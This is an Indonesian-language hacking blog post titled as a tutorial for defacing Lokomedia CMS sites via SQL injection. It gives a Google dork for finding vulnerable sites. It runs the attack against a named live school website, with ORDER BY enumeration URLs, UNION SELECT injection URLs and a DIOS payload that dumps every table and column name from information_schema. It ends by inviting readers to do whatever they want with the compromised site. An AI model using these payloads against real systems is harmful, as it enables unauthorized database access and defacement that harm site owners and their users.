Search

Tutorial / Cara Deface SQL Lokomedia


Hello All >_<

Kali ini gua mau ngasih kalian cara atau tutorial sql lokomedia, teknik ini sebenernya sama aja dengan sql biasa, cuma ga pake parameter.

Yang kalian butuhkan?
- HP / PC
- Dork
- DIOS (Buat ngedump)

Proof of Concept
- Dorking dulu menggunakan dork ini
* inurl:/hal-visi-misi.html site:.id (kembangin ya pake otak lu yg segede 2 kepalan tangan)

- Gua pake live target aja ya. http://smalsa.sch.id/hal-visi-misi.html

Sebelum dikasih '


- Tambahkan ' di (hal-visi-misi'.html) nanti akan jadi seperti dibawah, dan itu tandanya vuln.

Sesudah dikasih '

- Lalu kita coba +--+ dan ternyata webnya bener lagi, seperti semula.

- Disini langsung cari column yg error seperti ini.

http://smalsa.sch.id/hal-visi-misi'ORDER+BY+1+--+.html -> Normal
http://smalsa.sch.id/hal-visi-misi'ORDER+BY+2+--+.html -> Normal
http://smalsa.sch.id/hal-visi-misi'ORDER+BY+3+--+.html -> Normal

Skip..

http://smalsa.sch.id/hal-visi-misi'ORDER+BY+12+--+.html -> Normal
http://smalsa.sch.id/hal-visi-misi'ORDER+BY+13+--+.html -> Error

- Berarti columnya sampe 12 dan lalu kita tulis. union+select (lihat bawah)

http://smalsa.sch.id/hal-visi-misi'union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+.html

- Ga muncul angka togelnya? Tambahin +and+0+

http://smalsa.sch.id/hal-visi-misi'+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+.html

Muncul angka togelnya.

- Pilih tuh angka errornya, ganti dengan dios

(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(information_schema.columns)WHERE(@x)IN(@x:=CONCAT(0x20,@x,table_name,0x203a3a20,column_name,0x3c62723e))))x)

- Jadi seperti ini.


Done :)

- Udah deh, habis itu terserah mau kalian apain.

Makasih udah baca blog gua yang gajelas ini.
Note : Gua bukan mastah yang tahu segalanya, tapi gua orang yang ingin membagikan ilmu semampu gua bisa.

./MiSetya - Light Cyber Indonesia

Post a Comment

0 Comments